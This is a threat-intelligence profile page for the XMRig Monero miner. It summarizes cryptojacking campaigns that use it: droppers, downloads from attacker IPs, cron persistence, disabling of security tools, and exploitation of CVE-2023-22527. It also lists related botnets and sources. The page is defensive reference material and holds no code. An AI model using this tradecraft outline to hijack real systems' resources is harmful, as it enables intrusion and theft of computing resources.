Xmrig

Software updated 9 months ago (2024-10-17T12:07:11.133Z)
Download STIX
Preview STIX
XMRig is a high-performance mining software used for cryptocurrency, particularly Monero. This software has been utilized in various cyber attacks to exploit system resources and conduct cryptojacking activities. The operation begins with a dropper, which is responsible for the orchestration of the installation and execution of legitimate applications like the I2P tooling and the XMRig miner. Utilizing I2P, the dropper downloads a custom XMRig miner and manages the mining operations. Both i2pd and XMRig use legitimate file paths to mask their execution, making detection more challenging. The significant impact of these attacks is resource hijacking, where the XMRig miner exhausts the server's CPU resources. This situation occurs whether it's third-party proxyware or the XMRig Monero miner that perfctl drops onto a compromised server. Once the attacker has assembled their botnet, they can then use it for future malicious but profitable activities such as cryptocurrency mining, DDOS attacks, spam distribution, and data theft. The Dota3 botnet, known for its involvement in cryptojacking, deploys XMRig agents to compromised systems, indicating its primary purpose is to engage in crypto mining. The attack process involves several steps. Initially, the "check.sh" script creates necessary directories and verifies if the host hasn't been infected yet. If the host is the first to be infected, it downloads the "config.sh" from the attacker's IP and the XMRig coin miner from Github. The miner sets the pool URL with credentials using "config.json". To maintain persistence, the attacker uses multiple cron jobs, downloads the XMRig miner, and ensures all security tools are disabled before starting mining activities. A notable example is the exploitation of the critical vulnerability CVE-2023-22527 for cryptojacking activities, as reported by Trend Micro. After ensuring all cloud monitoring and security services are terminated or deleted, the attacker terminates the entry point process that exploits CVE-2023-22527 and downloads the XMRig miner to begin mining activities.
Description last updated: 2024-10-17T12:07:11.108Z
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at. Create a free account to see the source evidence for each alias, and help fix any errors.
Alias DescriptionVotes
Xmrig Miner is a possible alias for Xmrig. XMRig Miner is an open-source CPU/GPU miner software that supports numerous protocols. It's used in various cyber-attack campaigns to execute mining activities, often through the use of a dropper. The dropper is responsible for orchestrating the installation and execution of the legitimate applicati
8
Xmrig Crypto Miner is a possible alias for Xmrig. XMRig is a high-performance, open-source cryptocurrency mining software that allows users to mine Monero (XMR), among other cryptocurrencies. The software has been identified in several instances of unauthorized crypto-mining activities, often used in conjunction with other malicious software to exp
3
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Malware
Xmrig Miner
Payload
Cryptominer
Botnet
Linux
SSH
Ddos
Bot
Vulnerability
Exploit
Loader
Macos
Docker
Xmrig Crypto...
Windows
Github
Cron
PowerShell
Source
Python
Backdoor
Rootkit
Ddos Botnet
Trojan
Dropper
Downloader
Analyst Notes & Discussion
Be the first to leave your mark here! Log in to share your views and vote.
Associated Malware
To see the evidence that has resulted in these malware associations, create a free account
Alias DescriptionAssociation TypeVotes
The Shellbot Malware is associated with Xmrig. ShellBot is a malicious software (malware) variant that has been actively targeting poorly managed Linux SSH servers. As reported by Hacker News and HackRead in March 2023, this Perl-based DDoS bot deploys different variants to exploit these servers. ShellBot, along with another DDoS malware called Unspecified
2
The Rapperbot Malware is associated with Xmrig. RapperBot is a malicious software (malware) identified as a Distributed Denial of Service (DDoS) botnet first encountered by Fortinet in mid-June 2022. This malware, which brute-forces its way into Internet of Things (IoT) devices, primarily targeted Linux SSH servers. RapperBot is unique in that whUnspecified
2
Associated Vulnerabilities
To see the evidence that has resulted in these vulnerability associations, create a free account
Alias DescriptionAssociation TypeVotes
The CVE-2023-22527 Vulnerability is associated with Xmrig. CVE-2023-22527 is a critical vulnerability found in Atlassian's Confluence Server and Data Center. This flaw, rated 10 out of 10 on the CVSS v3 scale, is a template injection issue that allows an unauthenticated attacker to execute remote code. The vulnerability specifically affects outdated versionUnspecified
3
Source Document References
Information about the Xmrig Software was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
PreviewSource LinkCreatedAtTitle
Securityaffairs
9 months ago
DARKReading
9 months ago
Contagio
9 months ago
SANS ISC
10 months ago
Fortinet
10 months ago
Securityaffairs
10 months ago
DARKReading
10 months ago
Trend Micro
10 months ago
DARKReading
a year ago
BankInfoSecurity
a year ago
Securityaffairs
a year ago
Trend Micro
a year ago
DARKReading
a year ago
CERT-EU
a year ago
Securityaffairs
a year ago
Trend Micro
a year ago
Securityaffairs
a year ago
Securityaffairs
a year ago
DARKReading
a year ago
CERT-EU
a year ago